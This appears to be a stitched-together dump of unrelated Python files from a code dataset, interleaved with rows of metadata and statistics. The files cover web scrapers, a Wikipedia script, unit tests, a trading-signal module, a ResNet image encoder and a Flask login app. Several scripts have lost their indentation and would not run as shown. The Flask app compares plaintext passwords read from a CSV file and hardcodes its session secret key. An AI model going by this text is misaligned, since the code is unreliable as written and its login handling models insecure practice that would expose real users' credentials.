result['dayhour'] = soup.find("div", attrs={"id": "wob_dts"}).text
# get the actual weather
result['weather_now'] = soup.find("span", attrs={"id": "wob_dc"}).text
# get the precipitation
result['precipitation'] = soup.find("span", attrs={"id": "wob_pp"}).text
# get the % of humidity
result['humidity'] = soup.find("span", attrs={"id": "wob_hm"}).text
# extract the wind
result['wind'] = soup.find("span", attrs={"id": "wob_ws"}).text
# get next few days' weather
next_days = []
days = soup.find("div", attrs={"id": "wob_dp"})
for day in days.findAll("div", attrs={"class": "wob_df"}):
# extract the name of the day
day_name = day.find("div", attrs={"class": "vk_lgy"}).attrs['aria-label']
# get weather status for that day
weather = day.find("img").attrs["alt"]
temp = day.findAll("span", {"class": "wob_t"})
# maximum temperature in Celsius, use temp[1].text if you want Fahrenheit
max_temp = temp[0].text
# minimum temperature in Celsius, use temp[3].text if you want Fahrenheit
min_temp = temp[2].text
next_days.append({"name": day_name, "weather": weather, "max_temp": max_temp, "min_temp": min_temp})
# append to result
result['next_days'] = next_days
return result
if __name__ == "__main__":
URL = "https://www.google.com/search?lr=lang_en&ie=UTF-8&q=weather"
import argparse
parser = argparse.ArgumentParser(description="Quick Script for Extracting Weather data using Google Weather")
parser.add_argument("region", nargs="?", help="""Region to get weather for, must be available region.
Default is your current location determined by your IP Address""", default="")
# parse arguments
args = parser.parse_args()
region = args.region
URL += region
# get data
data = get_weather_data(URL)
# print data
print("Weather for:", data["region"])
print("Now:", data["dayhour"])
print(f"Temperature now: {data['temp_now']}C")
print("Description:", data['weather_now'])
print("Precipitation:", data["precipitation"])
print("Humidity:", data["humidity"])
print("Wind:", data["wind"])
print("Next days:")
for dayweather in data["next_days"]:
print("="*40, dayweather["name"], "="*40)
print("Description:", dayweather["weather"])
print(f"Max temperature: {dayweather['max_temp']}C")
print(f"Min temperature: {dayweather['min_temp']}C")
import requests
from bs4 import BeautifulSoup as bs
from urllib.parse import urljoin
import sys
# URL of the web page you want to extract
url = sys.argv[1]
# initialize a session
session = requests.Session()
# set the User-agent as a regular browser
session.headers["User-Agent"] = "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36"
# get the HTML content
html = session.get(url).content
# parse HTML using beautiful soup
soup = bs(html, "html.parser")
# get the JavaScript files
script_files = []
for script in soup.find_all("script"):
if script.attrs.get("src"):
# if the tag has the attribute 'src'
script_url = urljoin(url, script.attrs.get("src"))
script_files.append(script_url)
# get the CSS files
css_files = []
for css in soup.find_all("link"):
if css.attrs.get("href"):
# if the link tag has the 'href' attribute
css_url = urljoin(url, css.attrs.get("href"))
css_files.append(css_url)
print("Total script files in the page:", len(script_files))
print("Total CSS files in the page:", len(css_files))
# write file links into files
with open("javascript_files.txt", "w") as f:
for js_file in script_files:
print(js_file, file=f)
with open("css_files.txt", "w") as f:
for css_file in css_files:
print(css_file, file=f)
import wikipedia
# print the summary of what python is
print(wikipedia.summary("Python Programming Language"))
# search for a term
result = wikipedia.search("Neural networks")
print("Result search of 'Neural networks':", result)
# get the page: Neural network
page = wikipedia.page(result[0])
# get the title of the page
title = page.title
# get the categories of the page
categories = page.categories
# get the whole wikipedia page text (content)
content = page.content
# get all the links in the page
links = page.links
# get the page references
references = page.references
# summary
summary = page.summary
# print info
print("Page content:\n", content, "\n")
print("Page title:", title, "\n")
print("Categories:", categories, "\n")
print("Links:", links, "\n")
print("References:", references, "\n")
print("Summary:", summary, "\n")
import requests
from bs4 import BeautifulSoup as bs
def get_video_info(url):
# download HTML code
content = requests.get(url)
# create beautiful soup object to parse HTML
soup = bs(content.content, "html.parser")
# initialize the result
result = {}
# video title
result['title'] = soup.find("span", attrs={"class": "watch-title"}).text.strip()
# video views (converted to integer)
result['views'] = int(soup.find("div", attrs={"class": "watch-view-count"}).text[:-6].replace(",", ""))
# video description
result['description'] = soup.find("p", attrs={"id": "eow-description"}).text
# date published
result['date_published'] = soup.find("strong", attrs={"class": "watch-time-text"}).text
# number of likes as integer
result['likes'] = int(soup.find("button", attrs={"title": "I like this"}).text.replace(",", ""))
# number of dislikes as integer
result['dislikes'] = int(soup.find("button", attrs={"title": "I dislike this"}).text.replace(",", ""))
# channel details
channel_tag = soup.find("div", attrs={"class": "yt-user-info"}).find("a")
# channel name
channel_name = channel_tag.text
# channel URL
channel_url = f"https://www.youtube.com{channel_tag['href']}"
# number of subscribers as str
channel_subscribers = soup.find("span", attrs={"class": "yt-subscriber-count"}).text.strip()
result['channel'] = {'name': channel_name, 'url': channel_url, 'subscribers': channel_subscribers}
return result
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="YouTube Video Data Extractor")
parser.add_argument("url", help="URL of the YouTube video")
args = parser.parse_args()
# parse the video URL from command line
url = args.url
data = get_video_info(url)
# print in nice format
print(f"Title: {data['title']}")
print(f"Views: {data['views']}")
print(f"\nDescription: {data['description']}\n")
print(data['date_published'])
print(f"Likes: {data['likes']}")
print(f"Dislikes: {data['dislikes']}")
print(f"\nChannel Name: {data['channel']['name']}")
print(f"Channel URL: {data['channel']['url']}")
print(f"Channel Subscribers: {data['channel']['subscribers']}")
| 33.686085
| 878
| 0.610527
| 113,339
| 854,077
| 4.447163
| 0.032107
| 0.007624
| 0.002405
| 0.004345
| 0.831838
| 0.817033
| 0.804562
| 0.797469
| 0.790097
| 0.78178
| 0
| 0.026355
| 0.273989
| 854,077
| 25,354
| 879
| 33.686085
| 0.786517
| 0.174313
| 0
| 0.839193
| 0
| 0.01856
| 0.10153
| 0.024756
| 0
| 0
| 0
| 0.000158
| 0.001693
| 0
| null | null | 0.006909
| 0.096999
| null | null | 0.062657
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
4a0a2a16488fbcb23d6421199f8d56bd38298ee4
| 4,015
|
py
|
Python
|
src/tree_dict_test.py
|
yaricom/english-article-correction
|
e48e9af2d86e20ee0a3d091a5340a8669302c36a
|
[
"MIT"
] | 6
|
2017-06-05T08:58:55.000Z
|
2020-11-22T13:49:34.000Z
|
src/tree_dict_test.py
|
yaricom/english-article-correction
|
e48e9af2d86e20ee0a3d091a5340a8669302c36a
|
[
"MIT"
] | null | null | null |
src/tree_dict_test.py
|
yaricom/english-article-correction
|
e48e9af2d86e20ee0a3d091a5340a8669302c36a
|
[
"MIT"
] | 2
|
2017-04-24T08:19:06.000Z
|
2020-12-16T08:42:09.000Z
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
The tests for tree implementation
@author: yaric
"""
import unittest
import tree_dict as td
import config
import utils
class TestDeepTreeMethods(unittest.TestCase):
@classmethod
def setUpClass(cls):
data = utils.read_json(config.parse_train_path)
tree_dict = data[1]
root, index = td.treeFromJSON(tree_dict)
cls.root = root
def test_walk(self):
nodes = [n for n in td.walk(self.root)]
self.assertEqual(len(nodes), 125, "Nodes in the ROOT")
def test_leaves(self):
leaves = self.root.leaves()
self.assertEqual(len(leaves), 43, "Leaves in the ROOT")
def test_leaves_s_indexes(self):
leaves = self.root.leaves()
self.assertEqual(len(leaves), 43, "Leaves in the ROOT")
index = 0
for l in leaves:
self.assertEqual(l.s_index, index, "Index of leaf")
index += 1
def test_subtrees(self):
subtrees = self.root.subtrees()
self.assertEqual(len(subtrees), 82, "Subtrees in the ROOT [min_childs = 1]")
subtrees = self.root.subtrees(min_childs = 2)
self.assertEqual(len(subtrees), 28, "Subtrees in the ROOT [min_childs = 2]")
def test_np_subtrees(self):
subtrees = self.root.subtrees()
np_subtrees = 0
for st in subtrees:
if st.name == 'NP':
np_subtrees += 1
self.assertEqual(np_subtrees, 13, "NP Subtrees in the ROOT")
def test_deepNPSubtrees(self):
subtrees = self.root.deepNPSubtrees()
self.assertEqual(len(subtrees), 11, "Deep NP Subtrees in the ROOT")
def test_leaves_with_pos(self):
leaves = self.root.leavesWithPOS('DT')
self.assertEqual(len(leaves), 3, "Leaves with POS 'DT' in the ROOT")
def test_dpaSubtrees(self):
subtrees = self.root.dpaSubtrees()
self.assertEqual(len(subtrees), 3, "DPA Subtrees in the ROOT")
class TestShallowTreeMethods(unittest.TestCase):
@classmethod
def setUpClass(cls):
data = utils.read_json(config.parse_train_path)
tree_dict = data[723]
root, index = td.treeFromJSON(tree_dict)
cls.root = root
def test_walk(self):
nodes = [n for n in td.walk(self.root)]
self.assertEqual(len(nodes), 33, "Nodes in the ROOT")
def test_leaves(self):
leaves = self.root.leaves()
self.assertEqual(len(leaves), 14, "Leaves in the ROOT")
def test_leaves_s_indexes(self):
leaves = self.root.leaves()
self.assertEqual(len(leaves), 14, "Leaves in the ROOT")
index = 0
for l in leaves:
self.assertEqual(l.s_index, index, "Index of leaf")
index += 1
def test_subtrees(self):
subtrees = self.root.subtrees()
self.assertEqual(len(subtrees), 19, "Subtrees in the ROOT [min_childs = 1]")
subtrees = self.root.subtrees(min_childs = 2)
self.assertEqual(len(subtrees), 2, "Subtrees in the ROOT [min_childs = 2]")
def test_np_subtrees(self):
subtrees = self.root.subtrees()
np_subtrees = 0
for st in subtrees:
if st.name == 'NP':
np_subtrees += 1
self.assertEqual(np_subtrees, 4, "NP Subtrees in the ROOT")
def test_deepNPSubtrees(self):
subtrees = self.root.deepNPSubtrees()
self.assertEqual(len(subtrees), 4, "Deep NP Subtrees in the ROOT")
def test_leaves_with_pos(self):
leaves = self.root.leavesWithPOS('DT')
self.assertEqual(len(leaves), 1, "Leaves with POS 'DT' in the ROOT")
def test_dpaSubtrees(self):
subtrees = self.root.dpaSubtrees()
self.assertEqual(len(subtrees), 0, "DPA Subtrees in the ROOT")
if __name__ == '__main__':
unittest.main()
| 32.12
| 84
| 0.596015
| 502
| 4,015
| 4.649402
| 0.165339
| 0.128535
| 0.069409
| 0.051414
| 0.905741
| 0.888603
| 0.888603
| 0.888603
| 0.888603
| 0.888603
| 0
| 0.017637
| 0.293898
| 4,015
| 125
| 85
| 32.12
| 0.805644
| 0.023163
| 0
| 0.727273
| 0
| 0
| 0.130301
| 0
| 0
| 0
| 0
| 0
| 0.227273
| 1
| 0.204545
| false
| 0
| 0.045455
| 0
| 0.272727
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
4a118f04c0bbe52b576cf244b8fc711216b27b01
| 196
|
py
|
Python
|
Scraping/espirito_santo.py
|
Insper-Data/data_bcg_news
|
49986db18095759adea00bb0dedc149acebb683b
|
[
"MIT"
] | null | null | null |
Scraping/espirito_santo.py
|
Insper-Data/data_bcg_news
|
49986db18095759adea00bb0dedc149acebb683b
|
[
"MIT"
] | null | null | null |
Scraping/espirito_santo.py
|
Insper-Data/data_bcg_news
|
49986db18095759adea00bb0dedc149acebb683b
|
[
"MIT"
] | null | null | null |
import time
from selenium import webdriver
driver = webdriver.Firefox(executable_path=r"C:\Users\siddhartha\Downloads\geckodriver-v0.25.0-win64\geckodriver.exe")
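# note: the geckodriver path above is machine-specific. On Selenium 4+ the
# executable_path argument is deprecated; a minimal sketch of the newer style
# (assuming geckodriver is on PATH or resolvable by Selenium Manager):
#     from selenium.webdriver.firefox.service import Service
#     driver = webdriver.Firefox(service=Service())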
| 32.666667
| 119
| 0.826531
| 27
| 196
| 5.962963
| 0.740741
| 0.149068
| 0.223602
| 0.335404
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.033333
| 0.081633
| 196
| 5
| 120
| 39.2
| 0.861111
| 0
| 0
| 0.5
| 0
| 0.25
| 0.362245
| 0.362245
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.75
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
c596a34e57ad7da889c88b759979a97b7d0f5ba7
| 1,264
|
py
|
Python
|
tests/test_queries.py
|
eugene-davis/ebr-board
|
f592a752e17e869a6fd35ef82398f97748dbdc78
|
[
"Apache-2.0"
] | null | null | null |
tests/test_queries.py
|
eugene-davis/ebr-board
|
f592a752e17e869a6fd35ef82398f97748dbdc78
|
[
"Apache-2.0"
] | 4
|
2019-08-02T09:35:51.000Z
|
2019-08-05T04:45:47.000Z
|
tests/test_queries.py
|
LaudateCorpus1/ebr-board
|
f592a752e17e869a6fd35ef82398f97748dbdc78
|
[
"Apache-2.0"
] | 1
|
2021-09-14T03:58:40.000Z
|
2021-09-14T03:58:40.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Tests for `ebr_board` package."""
import pytest
from unittest.mock import patch
from ebr_board.database.queries import make_query
@patch("ebr_board.database.queries.BuildResults")
def test_make_query(mock_build_results):
"""
Basic smoke test for make_query
"""
result = make_query("test_index", None, [], [], agg=None, size=1, start=0)
assert mock_build_results.search.called_with("test_index")
assert mock_build_results.search.source.called_with([], [])
assert mock_build_results.search.query.called_with("bool", filter=[None])
assert mock_build_results.search.execute.called_with()
@patch("ebr_board.database.queries.BuildResults")
def test_make_query_agg(mock_build_results):
"""
Basic smoke test for make_query with aggregation
"""
result = make_query("test_index", None, [], [], agg="agg", size=1, start=0)
assert mock_build_results.search.called_with("test_index")
assert mock_build_results.search.source.called_with([], [])
assert mock_build_results.search.aggs.metric.called_with("fail_count", "agg")
assert mock_build_results.search.query.called_with("bool", filter=[None])
assert mock_build_results.search.execute.called_with()
| 34.162162
| 81
| 0.735759
| 176
| 1,264
| 5
| 0.284091
| 0.1125
| 0.2
| 0.225
| 0.788636
| 0.788636
| 0.788636
| 0.718182
| 0.718182
| 0.622727
| 0
| 0.004533
| 0.127373
| 1,264
| 36
| 82
| 35.111111
| 0.793291
| 0.121835
| 0
| 0.555556
| 0
| 0
| 0.132339
| 0.072693
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0.111111
| false
| 0
| 0.166667
| 0
| 0.277778
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
c5badeb05e4ec40a28d9a9aa7091d2cf623db5d4
| 176
|
py
|
Python
|
{{ cookiecutter.tool_name_slug }}/{{ cookiecutter.tool_name_slug }}/core/exceptions.py
|
polyglot-jones/cookiecutter-cli-filter
|
cc2552d16c619369c8f77cc4b4271e89ffbca6f8
|
[
"BSD-3-Clause"
] | null | null | null |
{{ cookiecutter.tool_name_slug }}/{{ cookiecutter.tool_name_slug }}/core/exceptions.py
|
polyglot-jones/cookiecutter-cli-filter
|
cc2552d16c619369c8f77cc4b4271e89ffbca6f8
|
[
"BSD-3-Clause"
] | null | null | null |
{{ cookiecutter.tool_name_slug }}/{{ cookiecutter.tool_name_slug }}/core/exceptions.py
|
polyglot-jones/cookiecutter-cli-filter
|
cc2552d16c619369c8f77cc4b4271e89ffbca6f8
|
[
"BSD-3-Clause"
] | null | null | null |
from gwpycore import GruntWurkError
class {{ cookiecutter.tool_name_camel_case }}Error(GruntWurkError):
pass
__all__ = ("{{ cookiecutter.tool_name_camel_case }}Error",)
| 22
| 67
| 0.772727
| 20
| 176
| 6.3
| 0.65
| 0.253968
| 0.31746
| 0.396825
| 0.539683
| 0.539683
| 0
| 0
| 0
| 0
| 0
| 0
| 0.119318
| 176
| 7
| 68
| 25.142857
| 0.812903
| 0
| 0
| 0
| 0
| 0
| 0.25
| 0.1875
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.25
| 0.25
| null | null | 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
c5ee74924a78c9c0df766e716d4888d5214109a1
| 2,793
|
py
|
Python
|
czsc/factors/bi_end.py
|
MakeBigBigMoney/czsc
|
8450c8912904b1d66a5c6e78d42c1b7d4b3d1777
|
[
"MIT"
] | 1
|
2021-07-07T11:15:48.000Z
|
2021-07-07T11:15:48.000Z
|
czsc/factors/bi_end.py
|
MakeBigBigMoney/czsc
|
8450c8912904b1d66a5c6e78d42c1b7d4b3d1777
|
[
"MIT"
] | null | null | null |
czsc/factors/bi_end.py
|
MakeBigBigMoney/czsc
|
8450c8912904b1d66a5c6e78d42c1b7d4b3d1777
|
[
"MIT"
] | null | null | null |
# coding: utf-8
import warnings
from typing import List, Dict, OrderedDict
from ..enum import Signals, Factors, Freq
from ..factors.utils import match_factor
# ======================================================================================================================
def future_bi_end_f30_base(s: [Dict, OrderedDict]):
"""期货30分钟笔结束"""
v = Factors.Other.value
for f_ in [Freq.F30.value, Freq.F5.value, Freq.F1.value]:
if f_ not in s['级别列表']:
warnings.warn(f"{f_} not in {s['级别列表']},默认返回 Other")
return v
# factors for opening a long position
# --------------------------------------------------------------------------------------------------------------
long_opens = {
Factors.L2A0.value: [
[f"{Freq.F30.value}_倒1表里关系#{Signals.BD0.value}"],
]
}
for name, factors in long_opens.items():
for factor in factors:
if match_factor(s, factor):
v = name
# factors for closing a long position
# --------------------------------------------------------------------------------------------------------------
long_exits = {
Factors.S2A0.value: [
[f"{Freq.F30.value}_倒1表里关系#{Signals.BU0.value}"],
]
}
for name, factors in long_exits.items():
for factor in factors:
if match_factor(s, factor):
v = name
return v
future_bi_end_f30 = future_bi_end_f30_base
# ======================================================================================================================
def share_bi_end_f30_base(s: [Dict, OrderedDict]):
"""股票30分钟笔结束"""
v = Factors.Other.value
for f_ in [Freq.F30.value, Freq.F5.value, Freq.F1.value]:
if f_ not in s['级别列表']:
warnings.warn(f"{f_} not in {s['级别列表']},默认返回 Other")
return v
# factors for closing a long position
# --------------------------------------------------------------------------------------------------------------
long_exits = {
Factors.S2A0.value: [
[f"{Freq.F30.value}_倒1表里关系#{Signals.BU0.value}"],
]
}
for name, factors in long_exits.items():
for factor in factors:
if match_factor(s, factor):
v = name
# factors for opening a long position
# --------------------------------------------------------------------------------------------------------------
long_opens = {
Factors.L2A0.value: [
[f"{Freq.F30.value}_倒1表里关系#{Signals.BD0.value}"],
]
}
for name, factors in long_opens.items():
for factor in factors:
if match_factor(s, factor):
v = name
return v
share_bi_end_f30 = share_bi_end_f30_base
# ======================================================================================================================
| 32.476744
| 120
| 0.39599
| 261
| 2,793
| 4.065134
| 0.203065
| 0.028275
| 0.04524
| 0.04524
| 0.835061
| 0.791706
| 0.791706
| 0.738926
| 0.738926
| 0.738926
| 0
| 0.022801
| 0.230576
| 2,793
| 85
| 121
| 32.858824
| 0.470917
| 0.307555
| 0
| 0.714286
| 0
| 0
| 0.129843
| 0.090052
| 0
| 0
| 0
| 0
| 0
| 1
| 0.035714
| false
| 0
| 0.071429
| 0
| 0.178571
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
680a944bd3911775dbc4aec05d6d674384582a13
| 98
|
py
|
Python
|
src/wandb_allennlp/training/__init__.py
|
mfa/wandb-allennlp
|
29ebba81cdbd83653350d00911c4a54d8da9def1
|
[
"MIT"
] | 22
|
2020-03-28T10:28:26.000Z
|
2022-02-17T12:31:17.000Z
|
src/wandb_allennlp/training/__init__.py
|
mfa/wandb-allennlp
|
29ebba81cdbd83653350d00911c4a54d8da9def1
|
[
"MIT"
] | 14
|
2020-03-21T17:04:40.000Z
|
2021-09-27T10:11:19.000Z
|
src/wandb_allennlp/training/__init__.py
|
mfa/wandb-allennlp
|
29ebba81cdbd83653350d00911c4a54d8da9def1
|
[
"MIT"
] | 4
|
2020-04-18T10:33:34.000Z
|
2021-02-02T11:57:28.000Z
|
from wandb_allennlp.training import train_and_test
from wandb_allennlp.training import callbacks
| 32.666667
| 51
| 0.887755
| 14
| 98
| 5.928571
| 0.642857
| 0.216867
| 0.409639
| 0.60241
| 0.746988
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.091837
| 98
| 2
| 52
| 49
| 0.932584
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
68100532ca2e665d9bdb08f2737cdbb883c5a1c5
| 4,951
|
py
|
Python
|
models/general/resnet.py
|
Malta-Lab/IUPE
|
44ddf119917538f02bb69509fec7a8314eed419f
|
[
"MIT"
] | 10
|
2020-08-14T00:39:39.000Z
|
2021-04-07T02:51:01.000Z
|
models/general/resnet.py
|
Malta-Lab/IUPE
|
44ddf119917538f02bb69509fec7a8314eed419f
|
[
"MIT"
] | 4
|
2020-08-13T14:07:48.000Z
|
2022-03-12T00:46:15.000Z
|
models/general/resnet.py
|
Malta-Lab/IUPE
|
44ddf119917538f02bb69509fec7a8314eed419f
|
[
"MIT"
] | 2
|
2020-08-17T14:38:54.000Z
|
2020-10-03T02:18:39.000Z
|
from copy import deepcopy
import torch
import torchvision
import torch.nn as nn
import torch.nn.functional as F
import torchvision.models as models
from .attention import Self_Attn2D
def normalize_imagenet(x):
''' Normalize input images according to ImageNet standards.
Args:
x (tensor): input images
'''
x = x.clone()
x[:, 0] = (x[:, 0] - 0.485) / 0.229
x[:, 1] = (x[:, 1] - 0.456) / 0.224
x[:, 2] = (x[:, 2] - 0.406) / 0.225
return x
def create_resnet(type):
    # Map the configuration string to the corresponding encoder class.
    if type == 'resnet':
        return Resnet
    elif type == 'attention-first':
        return ResnetFirst
    elif type == 'attention-last':
        return ResnetLast
    elif type == 'attention-all':
        return ResnetAll
    raise ValueError(f'Unknown resnet type: {type}')
class Resnet(nn.Module):
    r''' ResNet-18 encoder network for image input; outputs a 512-dimensional embedding per image.
    Args:
        normalize (bool): whether the input images should be normalized to ImageNet statistics
    '''
def __init__(self, normalize=False):
super().__init__()
self.normalize = normalize
self.features = models.resnet18(pretrained=True)
def forward(self, x):
img = deepcopy(x)
if self.normalize:
x = normalize_imagenet(x)
x = self.features.conv1(x)
x = self.features.bn1(x)
x = self.features.relu(x)
x = self.features.maxpool(x)
x = self.features.layer1(x) # 64
x = self.features.layer2(x) # 128
x = self.features.layer3(x) # 256
x = self.features.layer4(x) # 512
x = self.features.avgpool(x)
x = torch.flatten(x, 1) # batch, 512
return x
class ResnetFirst(nn.Module):
    r''' ResNet-18 encoder with self-attention after layer1 and layer2; outputs a 512-dimensional embedding per image.
    Args:
        normalize (bool): whether the input images should be normalized to ImageNet statistics
    '''
def __init__(self, normalize=False):
super().__init__()
self.normalize = normalize
self.features = models.resnet18(pretrained=True)
self.att = Self_Attn2D(64)
self.att2 = Self_Attn2D(128)
def forward(self, x):
img = deepcopy(x)
if self.normalize:
x = normalize_imagenet(x)
x = self.features.conv1(x)
x = self.features.bn1(x)
x = self.features.relu(x)
x = self.features.maxpool(x)
x = self.features.layer1(x) # 64
x, _ = self.att(x)
x = self.features.layer2(x) # 128
x, _ = self.att2(x)
x = self.features.layer3(x) # 256
x = self.features.layer4(x) # 512
x = self.features.avgpool(x)
x = torch.flatten(x, 1) # batch, 512
return x
class ResnetLast(nn.Module):
    r''' ResNet-18 encoder with self-attention after layer3 and layer4; outputs a 512-dimensional embedding per image.
    Args:
        normalize (bool): whether the input images should be normalized to ImageNet statistics
    '''
def __init__(self, normalize=False):
super().__init__()
self.normalize = normalize
self.features = models.resnet18(pretrained=True)
self.att3 = Self_Attn2D(256)
self.att4 = Self_Attn2D(512)
def forward(self, x):
img = deepcopy(x)
if self.normalize:
x = normalize_imagenet(x)
x = self.features.conv1(x)
x = self.features.bn1(x)
x = self.features.relu(x)
x = self.features.maxpool(x)
x = self.features.layer1(x) # 64
x = self.features.layer2(x) # 128
x = self.features.layer3(x) # 256
x, _ = self.att3(x)
x = self.features.layer4(x) # 512
x, _ = self.att4(x)
x = self.features.avgpool(x)
x = torch.flatten(x, 1) # batch, 512
return x
class ResnetAll(nn.Module):
    r''' ResNet-18 encoder with self-attention after every residual stage (layer1-layer4); outputs a 512-dimensional embedding per image.
    Args:
        normalize (bool): whether the input images should be normalized to ImageNet statistics
    '''
def __init__(self, normalize=False):
super().__init__()
self.normalize = normalize
self.features = models.resnet18(pretrained=True)
self.att = Self_Attn2D(64)
self.att2 = Self_Attn2D(128)
self.att3 = Self_Attn2D(256)
self.att4 = Self_Attn2D(512)
def forward(self, x):
img = deepcopy(x)
if self.normalize:
x = normalize_imagenet(x)
x = self.features.conv1(x)
x = self.features.bn1(x)
x = self.features.relu(x)
x = self.features.maxpool(x)
x = self.features.layer1(x) # 64
x, _ = self.att(x)
x = self.features.layer2(x) # 128
x, _ = self.att2(x)
x = self.features.layer3(x) # 256
x, _ = self.att3(x)
x = self.features.layer4(x) # 512
x, _ = self.att4(x)
x = self.features.avgpool(x)
x = torch.flatten(x, 1) # batch, 512
return x
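# Usage sketch, not part of the original module: pick an encoder variant via create_resnet and run a dummy
# batch through it. The constructors above load ImageNet-pretrained ResNet-18 weights (downloaded on first
# use) and the attention variants rely on the sibling Self_Attn2D module; every variant returns (batch, 512).
if __name__ == '__main__':
    encoder_cls = create_resnet('attention-all')
    encoder = encoder_cls(normalize=True)
    dummy = torch.rand(2, 3, 224, 224)  # two RGB images with values in [0, 1]
    with torch.no_grad():
        embeddings = encoder(dummy)
    print(embeddings.shape)  # expected: torch.Size([2, 512])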
| 26.61828
| 71
| 0.577863
| 645
| 4,951
| 4.344186
| 0.148837
| 0.078515
| 0.167024
| 0.1399
| 0.825482
| 0.825482
| 0.825482
| 0.825482
| 0.825482
| 0.825482
| 0
| 0.047923
| 0.304585
| 4,951
| 186
| 72
| 26.61828
| 0.765902
| 0.17855
| 0
| 0.762295
| 0
| 0
| 0.012192
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.081967
| false
| 0
| 0.057377
| 0
| 0.245902
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a8b5662ba5a62810eb631e072436a4c755f4dd55
| 41,411
|
py
|
Python
|
app.py
|
solilsan/Python3_SGE
|
f74eaeafa425a4107c35e70c3ba4019492f9a9fc
|
[
"Apache-2.0"
] | null | null | null |
app.py
|
solilsan/Python3_SGE
|
f74eaeafa425a4107c35e70c3ba4019492f9a9fc
|
[
"Apache-2.0"
] | null | null | null |
app.py
|
solilsan/Python3_SGE
|
f74eaeafa425a4107c35e70c3ba4019492f9a9fc
|
[
"Apache-2.0"
] | null | null | null |
from flask import Flask, request, session, render_template
import json, csv, os, datetime
# Initialize the Flask app that serves the HTML pages.
app = Flask(__name__)
app.secret_key = 'esto-es-una-clave-muy-secreta' # key used to sign the session cookie.
@app.errorhandler(404)
def page_not_found(e):
if 'loginC' in session:
if session['loginC']:
return render_template('inicio.html')
else:
return render_template('index.html')
else:
return render_template('index.html')
@app.errorhandler(405)
def method_not_allowed(e):
if 'loginC' in session:
if session['loginC']:
return render_template('inventario.html')
else:
return render_template('index.html')
else:
return render_template('index.html')
# Route for /index.html.
@app.route('/index.html')
def index():
    # Check whether the 'loginC' session key exists.
    # If it exists and is True, render the main page.
    # If it does not exist, create it as False and redirect to index.html.
if 'loginC' in session:
if session['loginC']:
return render_template('inicio.html')
else:
return render_template('index.html')
else:
return render_template('index.html')
# Route for /inicio.html.
@app.route('/inicio.html')
def inicio():
    # Check whether 'loginC' is True.
if session['loginC']:
return render_template('inicio.html')
else:
return render_template('index.html')
@app.route('/login', methods=['POST'])
def signUpUser():
    # Open the listaUsuarios.csv file and check whether the user is in it.
session['loginC'] = False
with open(os.getcwd()+'/Python3_SGE/datos/listaUsuarios.csv', 'r', encoding="ISO-8859-15") as File:
reader = csv.reader(File, delimiter=';', quotechar=';',
quoting=csv.QUOTE_MINIMAL)
for row in reader:
if row[1] == request.form['username'] and row[2] == request.form['password']:
session['idUser'] = row[0]
session['loginC'] = True
if session['loginC']:
return json.dumps(1);
else:
return json.dumps(0);
@app.route('/logout', methods=['POST'])
def logoutUser():
if session['loginC']:
session['loginC'] = False
return json.dumps(1);
else:
return json.dumps(0);
# Route for /inventario.html.
@app.route('/inventario.html')
def inventario():
if 'loginC' in session:
if session['loginC']:
valido = False
